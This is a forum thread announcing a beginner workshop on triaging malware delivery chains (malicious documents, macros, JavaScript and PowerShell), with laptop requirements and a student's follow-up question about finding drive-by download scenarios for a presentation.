Announcement

Collapse
No announcement yet.

Workshop Information: Malware Triage - Analyzing The Modern Malware Delivery Chain

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • Workshop Information: Malware Triage - Analyzing The Modern Malware Delivery Chain

    Title: Malware Triage - Analyzing The Modern Malware Delivery Chain

    Instructor: Sergei Frankoff & Sean Wilson

    Abstract: Malspam with an attached malicious document has now become the standard delivery vector for most criminal malware. In order to evade detection it is not uncommon for these malicious documents to execute a long chain of scripts involving macros, Javascript, and PowerShell before downloading the final payload. As a result incident responders and malware analysts need to be comfortable analyzing different document formats, and script languages to make sense of these delivery chains.

    In this workshop you will work through the triage of a live malware delivery chain that includes a malicious document, malicious scripts, and a final malware payload. During this process you will be exposed to different document formats, and malscripts while you practice the skills required to manually analyze these delivery chains. This workshop focuses on the fundamental analysis techniques used when identifying, deobfuscating, and analyzing maldocs and malscripts. However, we will also provide an introduction to some free and open source tools that can be used to speed up the analysis process.

    This workshop is aimed at junior incident responders, hobby malware analysts, and general security or IT practitioners who are interested in learning more about the malware triage process. If you have no experience with malware analysis but you have a good understanding of scripting languages like VBScript, and Javascript, and you are familiar with windows internals you should have no problem completing the workshop.

    You will be provided with a VirtualMachine to use during the workshop, please make sure to bring a laptop that meets the following requirements. Your laptop must have VirtualBox or VMWare installed and working prior to the start of the course. Your laptop must have at least 60GB of disk space free, preferably 100GB. Your laptop must also be able to mount USB storage devices. Make sure you have the appropriate dongle if you need one.

    Level: Beginner

    Pre-Requisites: None

    Required Materials: Students will be provided with a VirtualMachine to use during the workshop. They will need to bring a laptop that meets the following requirements:

    - The laptop must have VirtualBox or VMWare installed and working prior to class.
    - The laptop must have at least 60GB of disk space free, preferably 100GB.
    - The laptop must be able to mount USB storage devices (ensure you have the appropriate dongle if you need one).

  • #2
    Hello, I'm trying to create a Slideshare for students to explain the Analysis tools for Modern Malware Distribution Systems to do my project in the course of lectures. Where can I find the drive-by download attack scenario and screenshots of social engineering tactics? Thanks.

    Comment

    Working...
    X